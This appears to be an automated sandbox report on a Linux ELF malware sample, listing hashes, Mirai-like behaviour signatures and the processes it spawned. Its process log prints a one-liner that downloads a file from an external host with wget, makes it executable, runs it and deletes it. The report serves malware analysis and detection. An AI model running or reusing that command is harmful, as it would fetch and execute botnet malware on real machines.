Analysis
-
max time kernel
142s -
max time network
143s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240221-en -
resource tags
-
submitted
22/02/2024, 21:46
General
-
Target
ed53374c74224ead232e63bbe7fa7242.elf
-
Size
114KB
-
MD5
ed53374c74224ead232e63bbe7fa7242
-
SHA1
e1ffd571459085cc2bd4c7ea2bc5916d408a9be3
-
SHA256
918e9149b7bccfc9c8e9a22548e5953f249ac72bbf552af7774a41273a431d28
-
SHA512
82d75789a09b5518ba22c8b79b9719c7933e6f1c6660259bbe4fb220af761e3f151f35148cfa25adf1f7b067c4e3f836cbfdb9ee69257b1c0d4e016f25f7f3a0
-
SSDEEP
3072:uirMUYZMo/QJLRZDsqtxqLX5I/uJiouf2yd1m7FnVqfJXoebNb:SKo/O8qtUbKVbm7FnVqfJXoebNb
Score
7/10
Malware Config
Signatures
-
Changes its process name 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/ed53374c74224ead232e63bbe7fa7242.elf/tmp/ed53374c74224ead232e63bbe7fa7242.elf1⤵
- Changes its process name
- Reads system routing table
- Reads system network configuration
-
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."1⤵
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 .....2⤵
-
-
/tmp/....../.....2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./.....2⤵
-
-
/bin/rmrm -rf .....2⤵
-